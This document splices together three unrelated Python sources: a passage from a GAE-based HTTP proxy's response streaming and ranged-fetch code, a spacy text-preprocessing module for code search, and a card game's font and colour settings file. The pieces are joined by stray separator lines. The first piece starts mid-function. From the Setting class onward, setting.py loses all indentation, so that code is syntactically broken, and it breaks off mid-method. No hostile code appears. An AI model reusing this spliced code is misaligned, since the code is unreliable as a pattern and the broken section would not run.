    if 'X-Head-Content-Length' in response_headers:
        if method == "HEAD":
            # HEAD: report the real body length without a body
            response_headers['Content-Length'] = response_headers['X-Head-Content-Length']
        del response_headers['X-Head-Content-Length']

    content_length = int(response.headers.get('Content-Length', 0))
    content_range = response.headers.get('Content-Range', '')
    # content_range is used when merging ranged pieces
    if content_range and 'bytes */' not in content_range:
        start, end, length = tuple(int(x) for x in re.search(
            r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))
    else:
        # not ranged: whole body in one piece
        start, end, length = 0, content_length - 1, content_length

    if method == "HEAD":
        body_length = 0
    else:
        body_length = end - start + 1

    def send_response_headers():
        # write everything except the body
        wfile.write("HTTP/1.1 %d %s\r\n" % (response.status, response.reason))
        for key, value in response_headers.items():
            send_header(wfile, key, value)
            # xlog.debug("Head- %s: %s", key, value)
        wfile.write("\r\n")

    def is_text_content_type(content_type):
        # text/* and the common text-like application/* subtypes
        mct, _, sct = content_type.partition('/')
        if mct == 'text':
            return True
        if mct == 'application':
            sct = sct.split(';', 1)[0]
            if (sct in ('json', 'javascript', 'x-www-form-urlencoded') or
                    sct.endswith(('xml', 'script')) or
                    sct.startswith(('xml', 'rss', 'atom'))):
                return True
        return False

    data0 = ""
    content_type = response_headers.get("Content-Type", "")
    content_encoding = response_headers.get("Content-Encoding", "")
    # Old GAE server versions (< GPS 3.3.2) may double-wrap text bodies:
    # gzip around a deflate stream. Detect that and unwrap on the fly.
    if body_length and \
            content_encoding == "gzip" and \
            response.gps < "GPS 3.3.2" and \
            is_text_content_type(content_type):
        url_guess_type = guess_type(url)[0]
        if url_guess_type is None or is_text_content_type(url_guess_type):
            # try decode and detect type
            min_block = min(1024, body_length)
            data0 = response.task.read(min_block)
            if not data0 or len(data0) == 0:
                xlog.warn("recv body fail:%s", url)
                return

            gzip_decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS)
            decoded_data0 = gzip_decompressor.decompress(data0)

            deflate_decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
            decoded_data1 = None
            if len(decoded_data0) > 1:
                # check for a zlib header (CMF/FLG pair) inside the gzip data
                CMF, FLG = bytearray(decoded_data0[:2])
                if CMF & 0x0F == 8 and CMF & 0x80 == 0 and ((CMF << 8) + FLG) % 31 == 0:
                    decoded_data1 = deflate_decompressor.decompress(decoded_data0[2:])

            if decoded_data1 is None and len(decoded_data0) > 0:
                # maybe a raw deflate stream without the zlib header
                try:
                    decoded_data1 = deflate_decompressor.decompress(decoded_data0)
                    if deflate_decompressor.unused_data != '':
                        decoded_data1 = None
                except:
                    pass

            if decoded_data1:
                try:
                    response_headers.pop("Content-Length", None)

                    if "deflate" in headers.get("Accept-Encoding", ""):
                        # client accepts deflate: strip only the gzip layer
                        response_headers["Content-Encoding"] = "deflate"
                        send_response_headers()
                        while True:
                            wfile.write(decoded_data0)

                            if response.task.body_readed >= body_length:
                                break
                            data = response.task.read()
                            decoded_data0 = gzip_decompressor.decompress(data)
                        xlog.info("GAE send ungziped deflate data to browser t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method,
                                  url, response.task.get_trace())
                    else:
                        # fully inflate data and send it unencoded
                        del response_headers["Content-Encoding"]
                        send_response_headers()
                        while True:
                            wfile.write(decoded_data1)

                            if response.task.body_readed >= body_length:
                                break
                            data = response.task.read()
                            decoded_data0 = gzip_decompressor.decompress(data)
                            decoded_data1 = deflate_decompressor.decompress(decoded_data0)
                        xlog.info("GAE send ungziped data to browser t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method,
                                  url, response.task.get_trace())

                    return
                except Exception as e:
                    xlog.info("gae_handler.handler try decode and send response fail. e:%r %s", e, url)
                    return

    try:
        send_response_headers()

        if data0:
            # first probe chunk was already read above; flush it now
            wfile.write(data0)
            body_sended = len(data0)
        else:
            body_sended = 0
    except Exception as e:
        xlog.info("gae_handler.handler send response fail. e:%r %s", e, url)
        return

    while True:
        # body may arrive in several pieces from the fetch task
        if body_sended >= body_length:
            break

        data = response.task.read()
        if not data:
            xlog.warn("get body fail, until:%d %s",
                      body_length - body_sended, url)
            break

        body_sended += len(data)
        try:
            # write through the (possibly SSL-wrapped) client socket
            ret = wfile.write(data)
            if ret == ssl.SSL_ERROR_WANT_WRITE or ret == ssl.SSL_ERROR_WANT_READ:
                #xlog.debug("send to browser wfile.write ret:%d", ret)
                #ret = wfile.write(data)
                wfile.write(data)
        except Exception as e_b:
            if e_b[0] in (errno.ECONNABORTED, errno.EPIPE,
                          errno.ECONNRESET) or 'bad write retry' in repr(e_b):
                xlog.info('gae_handler send to browser return %r %r, len:%d, sended:%d', e_b, url, body_length, body_sended)
            else:
                xlog.info('gae_handler send to browser return %r %r', e_b, url)
            return

    # one complete proxied request finished
    xlog.info("GAE t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method, url,
              response.task.get_trace())
    return "ok"
class RangeFetch2(object):
    """Download one large response as parallel ranged sub-requests.

    Worker threads fetch AUTORANGE_MAXSIZE-sized ranges through the GAE
    proxy; the main loop (run) stitches the pieces back together in order
    and streams them to the client socket.
    """
    # per-instance buffered byte counts, shared at class level so the
    # global back-pressure limit covers all concurrent RangeFetch2 objects
    all_data_size = {}

    def __init__(self, method, url, headers, body, response, wfile):
        self.method = method
        self.wfile = wfile
        self.url = url
        self.headers = headers
        self.body = body
        self.response = response

        self.keep_running = True
        self.blocked = False

        self.lock = threading.Lock()
        self.waiter = threading.Condition(self.lock)

        # range_begin => payload, pieces waiting to be flushed in order
        self.data_list = {}

        self.data_size = 0

        self.req_begin = 0
        self.req_end = 0
        self.wait_begin = 0

    def get_all_buffer_size(self):
        """Total bytes buffered across every live RangeFetch2 instance."""
        return sum(v for k, v in self.all_data_size.items())

    def put_data(self, range_begin, payload):
        """Store a fetched piece and wake the writer if it is the next one."""
        with self.lock:
            if range_begin < self.wait_begin:
                raise Exception("range_begin:%d expect:%d" %
                                (range_begin, self.wait_begin))

            self.data_list[range_begin] = payload
            self.data_size += len(payload)
            self.all_data_size[self] = self.data_size

            if self.wait_begin in self.data_list:
                self.waiter.notify()

    def run(self):
        """Send headers, spawn fetch workers, and stream pieces in order.

        :return: "ok" on success, None when the client connection breaks.
        """
        req_range_begin = None
        req_range_end = None
        for k, v in self.headers.items():
            # xlog.debug("range req head:%s => %s", k, v)
            if k.lower() == "range":
                req_range_begin, req_range_end = tuple(
                    x for x in re.search(r'bytes=(\d*)-(\d*)', v).group(1, 2))
                # break

        response_headers = dict((k.title(), v)
                                for k, v in self.response.headers.items())
        content_range = response_headers['Content-Range']
        res_begin, res_end, res_length = tuple(int(x) for x in re.search(
            r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))

        # next range to request starts where the first response ended
        self.req_begin = res_end + 1
        if req_range_begin and req_range_end:
            self.req_end = int(req_range_end)
        else:
            self.req_end = res_length - 1
        self.wait_begin = res_begin

        if self.wait_begin == 0 and self.req_end == res_length - 1:
            # full content requested: answer as a plain 200
            response_headers['Content-Length'] = str(res_length)
            del response_headers['Content-Range']
            state_code = 200
        else:
            response_headers['Content-Range'] = 'bytes %s-%s/%s' % (
                res_begin, self.req_end, res_length)
            response_headers['Content-Length'] = str(
                self.req_end - res_begin + 1)
            state_code = 206

        response_headers["Persist"] = ""
        response_headers["Connection"] = "Persist"

        xlog.info('RangeFetch %d-%d started(%r) ',
                  res_begin, self.req_end, self.url)

        try:
            self.wfile.write("HTTP/1.1 %d OK\r\n" % state_code)
            for key in response_headers:
                if key in skip_response_headers:
                    continue
                value = response_headers[key]
                #xlog.debug("Head %s: %s", key.title(), value)
                send_header(self.wfile, key, value)
            self.wfile.write("\r\n")
        except Exception as e:
            self.keep_running = False
            xlog.info("RangeFetch send response fail:%r %s", e, self.url)
            return

        data_left_to_fetch = self.req_end - self.req_begin + 1
        fetch_times = int(
            (data_left_to_fetch + front.config.AUTORANGE_MAXSIZE - 1) / front.config.AUTORANGE_MAXSIZE)
        thread_num = min(front.config.AUTORANGE_THREADS, fetch_times)
        for i in xrange(0, thread_num):
            threading.Thread(target=self.fetch_worker).start()
        # the first (already received) response is drained on its own thread
        threading.Thread(target=self.fetch, args=(
            res_begin, res_end, self.response)).start()

        ok = "ok"
        while self.keep_running and \
                (front.config.use_ipv6 == "force_ipv6" and \
                check_local_network.IPv6.is_ok() or \
                front.config.use_ipv6 != "force_ipv6" and \
                check_local_network.is_ok()) and \
                self.wait_begin < self.req_end + 1:
            with self.lock:
                if self.wait_begin not in self.data_list:
                    self.waiter.wait()

                if self.wait_begin not in self.data_list:
                    xlog.error("get notify but no data")
                    continue
                else:
                    data = self.data_list[self.wait_begin]
                    del self.data_list[self.wait_begin]
                    self.wait_begin += len(data)
                    self.data_size -= len(data)
                    self.all_data_size[self] = self.data_size

            try:
                ret = self.wfile.write(data)
                if ret == ssl.SSL_ERROR_WANT_WRITE or ret == ssl.SSL_ERROR_WANT_READ:
                    xlog.debug(
                        "send to browser wfile.write ret:%d, retry", ret)
                    ret = self.wfile.write(data)
                    xlog.debug("send to browser wfile.write ret:%d", ret)
                del data
            except Exception as e:
                xlog.info('RangeFetch client closed(%s). %s', e, self.url)
                ok = None
                break
        self.keep_running = False
        self.all_data_size.pop(self, None)
        return ok

    def fetch_worker(self):
        """Worker loop: claim the next range and fetch it, with back-pressure."""
        blocked = False
        while self.keep_running:
            if blocked:
                time.sleep(0.5)

            with self.lock:
                # at least 2 wait workers keep running
                if self.req_begin > self.wait_begin + front.config.AUTORANGE_MAXSIZE:
                    # pause when buffered data across all fetches exceeds the cap
                    if self.get_all_buffer_size() > front.config.AUTORANGE_MAXBUFFERSIZE * (0.8 + len(self.all_data_size) * 0.2):
                        if not self.blocked:
                            xlog.debug("fetch_worker blocked, buffer:%d %s",
                                       self.data_size, self.url)
                        self.blocked = blocked = True
                        continue

                self.blocked = blocked = False

                if self.req_begin >= self.req_end + 1:
                    break

                begin = self.req_begin
                end = min(begin + front.config.AUTORANGE_MAXSIZE - 1, self.req_end)
                self.req_begin = end + 1

            self.fetch(begin, end, None)

    def fetch(self, begin, end, first_response):
        """Fetch bytes [begin, end] and feed them into put_data.

        :param first_response: an already-received response to drain instead
               of issuing a new request (used for the initial 206 reply).
        """
        headers = dict((k.title(), v) for k, v in self.headers.items())
        retry_num = 0
        while self.keep_running:
            retry_num += 1
            if retry_num > 20:
                xlog.warn("RangeFetch try max times, exit. %s", self.url)
                self.close()
                break

            expect_len = end - begin + 1
            headers['Range'] = 'bytes=%d-%d' % (begin, end)

            if first_response:
                response = first_response
            else:
                try:
                    response = request_gae_proxy(
                        self.method, self.url, headers, self.body)
                except GAE_Exception as e:
                    xlog.warning('RangeFetch %s request fail:%r',
                                 headers['Range'], e)
                    continue

            if response.app_msg:
                response.worker.close(
                    "range get gae status:%d" % response.app_status)
                continue

            response.status = response.app_status
            if response.headers.get('Location', None):
                # follow redirects by updating the shared URL and retrying
                self.url = urlparse.urljoin(
                    self.url, response.headers.get('Location'))
                xlog.warn('RangeFetch Redirect(%r) status:%s',
                          self.url, response.status)
                continue

            if response.status >= 300:
                #xlog.error('RangeFetch %r return %s :%s', self.url, response.status, cgi.escape(response.body))
                response.worker.close("range status:%s" % response.status)
                continue

            content_range = response.headers.get('Content-Range', "")
            if not content_range:
                xlog.warning('RangeFetch "%s %s" return headers=%r, retry %s-%s',
                             self.method, self.url, response.headers, begin, end)
                # if len(response.body) < 2048:
                #xlog.warn('body:%s', cgi.escape(response.body))
                # response.worker.close("no range")
                continue

            content_length = int(response.headers.get('Content-Length', 0))

            data_readed = 0
            while True:
                if data_readed >= content_length:
                    percent = begin * 100 / self.req_end
                    xlog.debug('RangeFetch [%s] %d%% length:%s range:%s %s %s',
                               response.ssl_sock.ip, percent,
                               content_length, content_range, self.url, response.task.get_trace())
                    break

                data = response.task.read()
                if not data:
                    xlog.warn("RangeFetch [%s] get body fail, begin:%d %s",
                              response.ssl_sock.ip, begin, self.url)
                    break

                data_len = len(data)
                data_readed += data_len
                if data_len > expect_len:
                    # server sent more than requested; truncate to the range
                    xlog.warn("RangeFetch expect:%d, get:%d",
                              expect_len, data_len)
                    data = data[:expect_len]
                    data_len = expect_len

                self.put_data(begin, data)

                expect_len -= data_len
                begin += data_len

            if begin >= end + 1:
                break

            xlog.warn("RangeFetch get left, begin:%d end:%d", begin, end)

    def close(self):
        """Stop all workers and wake the writer thread."""
        self.keep_running = False
        with self.lock:
            self.waiter.notify()
|
text_preprocessing.py | # © 2020 Nokia
#
# Licensed under the BSD 3 Clause license
#
# SPDX-License-Identifier: BSD-3-Clause
# ============================================
import re
import time
from threading import Thread
from traceback import print_exc
import spacy
from codesearch.stopwords import stopwords
def async_fn(f):
    """Decorator: run *f* on a daemon background thread.

    The returned wrapper starts the thread and returns None immediately;
    exceptions inside *f* die with the thread.
    """
    def wrapper(*args, **kwargs):
        worker = Thread(target=f, args=args, kwargs=kwargs)
        worker.daemon = True
        worker.start()
    return wrapper
# Lazily-initialised spacy pipeline; -1 marks a failed initialisation.
_nlp = None
# Guard so only one background initialisation runs at a time.
_initializing_nlp = False

@async_fn
def init_nlp():
    """Load the spacy en_core_web_md model in a background thread.

    Resets spacy's built-in stop words and installs the project's own
    stopword list (both lower-case and capitalised forms). On success the
    module global _nlp holds the pipeline; on any failure it is set to -1.
    """
    try:
        global _nlp, _initializing_nlp
        if _initializing_nlp: return
        _initializing_nlp = True
        # spacy 3.x dropped the `vectors` keyword used by the 2.x call below
        if spacy.__version__[0] == '3':
            nlp = spacy.load("en_core_web_md", disable=['parser', 'ner', 'tagger'])
        else:
            nlp = spacy.load("en_core_web_md", vectors=False, disable=['parser', 'ner', 'tagger'])
        for word in nlp.vocab:
            word.is_stop = False
        for word in stopwords:
            t = nlp.vocab[word]
            t.is_stop = True
            t = nlp.vocab[word.capitalize()]
            t.is_stop = True
        _nlp = nlp
        print("\nInitialized spacy nlp")
    except:
        print_exc()
        _nlp = -1
def nlp():
    """Return the shared spacy pipeline, blocking until it is available.

    Kicks off the asynchronous load if nobody has yet, then polls once a
    second while drawing a small text spinner.  Returns whatever
    init_nlp() published: the Language object on success, -1 on failure.
    """
    spinner = ("|", "/", "─", "\\")
    tick = 0
    while _nlp is None:
        if not _initializing_nlp:
            init_nlp()
        symbol = spinner[tick % 4]
        print(f"\rInitializing spacy nlp {symbol}", end="")
        time.sleep(1)
        tick += 1
    return _nlp
def preprocess_text(text, lemmatize=True, remove_stop=True, clean_howto=True):
    """Tokenize *text* and return a list of normalized token strings.

    Optionally strips a leading how-to prefix, drops comment markers and
    whitespace tokens, optionally drops stop words, and finally lowercases
    either the lemma or the surface form of each remaining token.
    """
    comment_markers = {"#", "//", "/**", "*/"}
    if clean_howto:
        text = clean_how_to(text)
    kept = []
    for tok in nlp()(text):
        if str(tok) in comment_markers:
            continue
        if remove_stop and tok.is_stop:
            continue
        if str(tok).isspace():
            continue
        kept.append(tok)
    if lemmatize:
        return [tok.lemma_.lower().strip() for tok in kept]
    return [str(tok).lower().strip() for tok in kept]
def compute_overlap(q, d):
    """Lexical overlap between query *q* and document *d*.

    Both texts are reduced to the set of lowercased lemmas of their
    non-stopword tokens.  Returns ``(|Q & D|, |Q & D| / |Q|)``.

    Fixes two defects of the original: the intersection was computed
    twice, and an all-stopword query raised ZeroDivisionError (now
    returns ``(0, 0.0)``).
    """
    q_toks = set(t.lemma_.lower() for t in nlp()(q) if not t.is_stop)
    d_toks = set(t.lemma_.lower() for t in nlp()(d) if not t.is_stop)
    common = q_toks & d_toks
    if not q_toks:
        return 0, 0.0
    return len(common), len(common) / len(q_toks)
# Matches the leading "how to ..." style prefixes of natural-language queries
# ("How to X", "how do I/you X", "best way to X", "can you/I X", ...).
how_to_pattern = "^([hH]ow to |[hH]ow do ([Ii] |you )|[Hh]ow does one |([tT]he )?[Bb]est way to |([Hh]ow )?[Cc]an (you |[Ii] ))"


def is_how_to(t):
    """Return a truthy re.Match if *t* starts with a how-to prefix, else None."""
    return re.match(how_to_pattern, t)


def clean_how_to(t):
    """Strip a leading how-to prefix and trailing '?', capitalizing the rest.

    Fix: when nothing remains after stripping (e.g. the input was exactly
    "How to ?"), return "" instead of raising IndexError on ``t[0]``.
    """
    t = re.sub(how_to_pattern, "", t)
    if t.endswith("?"):
        t = t[:-1]
    if not t:
        return ""
    return t[0].capitalize() + t[1:]
|
setting.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import ctypes
import hashlib
import inspect
import math
import struct
import shutil
import weakref
import array
import re
import threading
import copy
import ConfigParser
import time
import wx
import pygame
import pygame.locals
import cw
class NoFontError(ValueError):
    """Raised when no usable font could be located."""
if sys.platform != "win32":
    # Fonts must be registered with fontconfig before wx.App is loaded.
    # Fix: the Python-2-only "<>" operator was replaced with "!=", which is
    # valid in both Python 2 and 3.
    try:
        fontconfig = ctypes.CDLL("libfontconfig.so")
    except OSError:
        try:
            fontconfig = ctypes.CDLL("libfontconfig.so.1")
        except OSError:
            # Best effort: without fontconfig, font registration is skipped.
            fontconfig = None
    if fontconfig:
        fcconfig = fontconfig.FcConfigGetCurrent()
        # Register every bundled TrueType font under Data/ with fontconfig.
        for dpath, dnames, fnames in os.walk(u"Data"):
            for fname in fnames:
                if fname.lower().endswith(".ttf"):
                    path = os.path.join(dpath, fname)
                    if os.path.isfile(path):
                        fontconfig.FcConfigAppFontAddFile(fcconfig, path)
# Behavior when the mouse wheel is rolled upward
WHEEL_SELECTION = "Selection" # select cards and choices
WHEEL_SHOWLOG = "ShowLog" # show the message backlog
# Cursor type
CURSOR_BLACK = "Black" # black cursor (default)
CURSOR_WHITE = "White" # white cursor
# Message log display format
LOG_SINGLE = "Single"
LOG_LIST = "List"
LOG_COMPRESS = "Compress"
# Behavior at startup
OPEN_TITLE = "Title"
OPEN_LAST_BASE = "LastBase"
# Whether to show a confirmation dialog before saving
CONFIRM_BEFORESAVING_YES = "True"
CONFIRM_BEFORESAVING_NO = "False"
CONFIRM_BEFORESAVING_BASE = "BaseOnly" # shown only while at the base (inn)
# Status bar button state (bit flags)
SB_PRESSED = 0b00000001 # pressed
SB_CURRENT = 0b00000010 # under the cursor (hover)
SB_DISABLE = 0b00000100 # disabled
SB_NOTICE = 0b00001000 # notification pending
SB_EMPHASIZE = 0b00010000 # emphasized
class LocalSetting(object):
    """Display settings that a skin is allowed to override (see load())."""

    def __init__(self):
        """Settings that can be overridden by a skin."""
        # When True, these local draw/font settings take precedence.
        self.important_draw = False
        self.important_font = False
        # Window / curtain colors as (r, g, b, alpha) tuples.
        self.mwincolour = (0, 0, 80, 180)
        self.mwinframecolour = (128, 0, 0, 255)
        self.blwincolour = (80, 80, 80, 180)
        self.blwinframecolour = (128, 128, 128, 255)
        self.curtaincolour = (0, 0, 80, 128)
        self.blcurtaincolour = (0, 0, 0, 192)
        # Full-screen background type: 0 = none, 1 = file, 2 = skin (per load()).
        self.fullscreenbackgroundtype = 2
        self.fullscreenbackgroundfile = u"Resource/Image/Dialog/PAD"
        self.decorationfont = False
        self.bordering_cardname = True
        self.fontsmoothing_message = False
        self.fontsmoothing_cardname = False
        self.fontsmoothing_statusbar = True
        # Base font face per family key; "" means use the platform default.
        self.basefont = {
            "gothic": "",
            "uigothic": "",
            "mincho": "",
            "pmincho": "",
            "pgothic": "",
        }
        # Per-role fonts. Tuple layout (established by the unpack in load()):
        # (family key, face name, pixels, bold, bold-when-expanded, italic).
        self.fonttypes = {
            "button": ("pgothic", "", -1, True, True, False),
            "combo": ("uigothic", "", -1, False, False, False),
            "tree": ("gothic", "", -1, False, False, False),
            "tab": ("pgothic", "", -1, True, True, False),
            "menu": ("uigothic", "", -1, False, False, False),
            "scenario": ("pmincho", "", -1, True, True, False),
            "targetlevel": ("pmincho", "", -1, True, True, True),
            "paneltitle": ("pmincho", "", -1, True, True, False),
            "paneltitle2": ("uigothic", "", -1, False, False, False),
            "dlgmsg": ("uigothic", "", -1, True, True, False),
            "dlgmsg2": ("uigothic", "", -1, False, False, False),
            "dlgtitle": ("mincho", "", -1, True, True, False),
            "dlgtitle2": ("pgothic", "", -1, True, True, True),
            "createtitle": ("pgothic", "", -1, True, True, True),
            "inputname": ("mincho", "", -1, True, True, False),
            "datadesc": ("gothic", "", -1, False, False, False),
            "charadesc": ("mincho", "", -1, True, True, False),
            "charaparam": ("pmincho", "", -1, True, True, True),
            "charaparam2": ("pmincho", "", -1, True, True, False),
            "characre": ("pgothic", "", -1, True, True, False),
            "dlglist": ("mincho", "", -1, True, True, False),
            "uselimit": ("mincho", "", 18, False, False, False),
            "cardname": ("uigothic", "", 12, True, True, False),
            "ccardname": ("uigothic", "", 12, True, True, False),
            "level": ("mincho", "", 33, True, True, True),
            "numcards": ("uigothic", "", 18, False, False, False),
            "message": ("mincho", "", 22, True, True, False),
            "selectionbar": ("uigothic", "", 14, True, True, False),
            "logpage": ("mincho", "", 24, False, False, False),
            "sbarpanel": ("mincho", "", 16, True, True, False),
            "sbarprogress": ("mincho", "", 16, True, True, False),
            "sbarbtn": ("pgothic", "", 12, True, True, False),
            "statusnum": ("mincho", "", 12, True, True, False), # -2 per additional digit
            "sbardesctitle": ("pgothic", "", 14, True, True, False),
            "sbardesc": ("uigothic", "", 14, False, False, False),
            "screenshot": ("pmincho", "", 18, False, False, False),
        }
        if sys.platform == "win32":
            # NOTE(review): GetFacenames is called without an instance here
            # but with one a few lines below — confirm both forms work in the
            # wxPython build in use.
            if u"Times New Roman" in wx.FontEnumerator.GetFacenames():
                self.fonttypes["charaparam"] = "", u"Times New Roman", -1, True, True, True
                self.fonttypes["dlgtitle"] = "", u"Times New Roman", -1, True, True, False
                self.fonttypes["sbarpanel"] = "", u"Times New Roman", 15, True, True, True
            # Prefer the standard Windows fonts when they are available.
            facenames = set(wx.FontEnumerator().GetFacenames())
            if u"MS UI Gothic" in facenames:
                self.basefont["uigothic"] = u"MS UI Gothic"
            if u"MS 明朝" in facenames:
                self.basefont["mincho"] = u"MS 明朝"
            if u"MS P明朝" in facenames:
                self.basefont["pmincho"] = u"MS P明朝"
            if u"MS ゴシック" in facenames:
                self.basefont["gothic"] = u"MS ゴシック"
            if u"MS Pゴシック" in facenames:
                self.basefont["pgothic"] = u"MS Pゴシック"
        # Snapshot every public attribute as "<name>_init" so load() can fall
        # back to these defaults (lists/dicts are shallow-copied).
        for t in inspect.getmembers(self, lambda t: not inspect.isroutine(t)):
            if not t[0].startswith("__"):
                if isinstance(t[1], list):
                    v = t[1][:]
                elif hasattr(t[1], "copy"):
                    v = t[1].copy()
                else:
                    v = t[1]
                setattr(self, "%s_init" % (t[0]), v)

    def load(self, data):
        """Load settings from *data*.

        *data* is a config object exposing getbool/getint/gettext/getfind
        (presumably an XML element wrapper from cw.data — TODO confirm).
        Missing entries fall back to the "<name>_init" defaults snapshotted
        in __init__.
        """
        self.basefont = self.basefont_init.copy()
        self.fonttypes = self.fonttypes_init.copy()
        # Whether these settings override the base configuration.
        self.important_draw = data.getbool(".", "importantdrawing", False)
        self.important_font = data.getbool(".", "importantfont", False)
        # Message window color and opacity
        r = data.getint("MessageWindowColor", "red", self.mwincolour_init[0])
        g = data.getint("MessageWindowColor", "green", self.mwincolour_init[1])
        b = data.getint("MessageWindowColor", "blue", self.mwincolour_init[2])
        a = data.getint("MessageWindowColor", "alpha", self.mwincolour_init[3])
        self.mwincolour = Setting.wrap_colorvalue(r, g, b, a)
        r = data.getint("MessageWindowFrameColor", "red", self.mwinframecolour_init[0])
        g = data.getint("MessageWindowFrameColor", "green", self.mwinframecolour_init[1])
        b = data.getint("MessageWindowFrameColor", "blue", self.mwinframecolour_init[2])
        a = data.getint("MessageWindowFrameColor", "alpha", self.mwinframecolour_init[3])
        self.mwinframecolour = Setting.wrap_colorvalue(r, g, b, a)
        # Backlog window color and opacity
        r = data.getint("MessageLogWindowColor", "red", self.blwincolour_init[0])
        g = data.getint("MessageLogWindowColor", "green", self.blwincolour_init[1])
        b = data.getint("MessageLogWindowColor", "blue", self.blwincolour_init[2])
        a = data.getint("MessageLogWindowColor", "alpha", self.blwincolour_init[3])
        self.blwincolour = Setting.wrap_colorvalue(r, g, b, a)
        r = data.getint("MessageLogWindowFrameColor", "red", self.blwinframecolour_init[0])
        g = data.getint("MessageLogWindowFrameColor", "green", self.blwinframecolour_init[1])
        b = data.getint("MessageLogWindowFrameColor", "blue", self.blwinframecolour_init[2])
        a = data.getint("MessageLogWindowFrameColor", "alpha", self.blwinframecolour_init[3])
        self.blwinframecolour = Setting.wrap_colorvalue(r, g, b, a)
        # Message log curtain color
        r = data.getint("MessageLogCurtainColor", "red", self.blcurtaincolour_init[0])
        g = data.getint("MessageLogCurtainColor", "green", self.blcurtaincolour_init[1])
        b = data.getint("MessageLogCurtainColor", "blue", self.blcurtaincolour_init[2])
        a = data.getint("MessageLogCurtainColor", "alpha", self.blcurtaincolour_init[3])
        self.blcurtaincolour = (r, g, b, a)
        # Curtain color
        r = data.getint("CurtainColor", "red", self.curtaincolour_init[0])
        g = data.getint("CurtainColor", "green", self.curtaincolour_init[1])
        b = data.getint("CurtainColor", "blue", self.curtaincolour_init[2])
        a = data.getint("CurtainColor", "alpha", self.curtaincolour_init[3])
        self.curtaincolour = (r, g, b, a)
        # Outline card names
        self.bordering_cardname = data.getbool("BorderingCardName", self.bordering_cardname_init)
        # Use decorated fonts in messages
        self.decorationfont = data.getbool("DecorationFont", self.decorationfont_init)
        # Smooth (antialias) message text
        self.fontsmoothing_message = data.getbool("FontSmoothingMessage", self.fontsmoothing_message_init)
        # Smooth card-name text
        self.fontsmoothing_cardname = data.getbool("FontSmoothingCardName", self.fontsmoothing_cardname_init)
        # Smooth status-bar text
        self.fontsmoothing_statusbar = data.getbool("FontSmoothingStatusBar", self.fontsmoothing_statusbar_init)
        # Font face names (blank = default)
        self.basefont["gothic"] = data.gettext("FontGothic", self.basefont_init["gothic"])
        self.basefont["uigothic"] = data.gettext("FontUIGothic", self.basefont_init["uigothic"])
        self.basefont["mincho"] = data.gettext("FontMincho", self.basefont_init["mincho"])
        self.basefont["pmincho"] = data.gettext("FontPMincho", self.basefont_init["pmincho"])
        self.basefont["pgothic"] = data.gettext("FontPGothic", self.basefont_init["pgothic"])
        # Per-role fonts; unspecified fields fall back to the _init tuple.
        for e in data.getfind("Fonts", raiseerror=False):
            key = e.getattr(".", "key", "")
            if not key or not key in self.fonttypes_init:
                continue
            _deftype, _defname, defpixels, defbold, defbold_upscr, defitalic = self.fonttypes_init[key]
            fonttype = e.getattr(".", "type", "")
            name = e.text if e.text else u""
            pixels = e.getint(".", "pixels", defpixels)
            bold = e.getattr(".", "bold", "")
            if bold == "":
                bold = defbold
            else:
                bold = cw.util.str2bool(bold)
            bold_upscr = e.getattr(".", "expandedbold", "")
            if bold_upscr == "":
                bold_upscr = defbold_upscr
            else:
                bold_upscr = cw.util.str2bool(bold_upscr)
            italic = e.getattr(".", "italic", "")
            if italic == "":
                italic = defitalic
            else:
                italic = cw.util.str2bool(italic)
            self.fonttypes[key] = (fonttype, name, pixels, bold, bold_upscr, italic)
        # Background type in full screen (0: none, 1: file, 2: skin)
        self.fullscreenbackgroundtype = data.getint("FullScreenBackgroundType", self.fullscreenbackgroundtype_init)
        # Background file in full screen
        self.fullscreenbackgroundfile = data.gettext("FullScreenBackgroundFile", self.fullscreenbackgroundfile_init)

    def copy(self):
        """Return a deep copy of this settings object."""
        return copy.deepcopy(self)
class Setting(object):
def __init__(self, loadfile=None, init=True):
# フレームレート
self.fps = 60
# 1frame分のmillseconds
self.frametime = 1000 / self.fps
# Settings
self.init_settings(loadfile, init=init)
def init_settings(self, loadfile=None, init=True):
path = cw.util.join_paths("Data/SkinBase/Skin.xml")
basedata = cw.data.xml2etree(path)
self.skin_local = LocalSetting()
# "Settings_Lite.xml"がなかったら新しく作る
self.local = LocalSetting()
self.editor = "cwxeditor-classic"
self.startupscene = OPEN_TITLE
self.lastyado = ""
self.lastscenario = []
self.lastscenariopath = ""
self.window_position = (None, None)
self.expanddrawing = 1
self.expandmode = "FullScreen"
self.is_expanded = False
self.smoothexpand = True
self.debug = False
self.debug_saved = False
self.no_levelup_in_debugmode = True
self.play_bgm = True
self.play_sound = True
self.vol_master = 0.5
self.vol_bgm = 0.5
self.vol_bgm_midi = 0.5
self.vol_sound = 0.5
self.vol_sound_midi = 0.5
self.soundfonts = [(cw.DEFAULT_SOUNDFONT, True, 100)]
self.bassmidi_sample32bit = True
self.messagespeed = 5
self.dealspeed = 5
self.dealspeed_battle = 5
self.wait_usecard = True
self.use_battlespeed = False
self.transition = "Fade"
self.transitionspeed = 5
self.smoothscale_bg = False
self.smoothing_card_up = True
self.smoothing_card_down = True
self.caution_beforesaving = True
self.revert_cardpocket = True
self.quickdeal = True
self.all_quickdeal = True
self.skindirname = "Classic"
self.vocation120 = False
self.sort_yado = "None"
self.sort_standbys = "None"
self.sort_parties = "None"
self.sort_cards = "None"
self.sort_cardswithstar = True
self.card_narrow = ""
self.card_narrowtype = 1
self.edit_star = False
self.yado_narrowtype = 1
self.standbys_narrowtype = 1
self.parties_narrowtype = 1
self.infoview_narrowtype = 1
self.backlogmax = 100
self.messagelog_type = LOG_COMPRESS
self.showfps = False
self.selectscenariofromtype = True
self.show_unfitnessscenario = True
self.show_completedscenario = True
self.show_invisiblescenario = False
self.wheelup_operation = WHEEL_SHOWLOG
self.wheel_movefocus = True
self.show_allselectedcards = True
self.confirm_beforeusingcard = True
self.confirm_dumpcard = True
self.confirm_beforesaving = CONFIRM_BEFORESAVING_YES
self.show_savedmessage = True
self.show_backpackcard = True
self.show_backpackcardatend = True
self.show_statustime = True
self.noticeimpossibleaction = True
self.initmoneyamount = basedata.getint("Property/InitialCash", 4000)
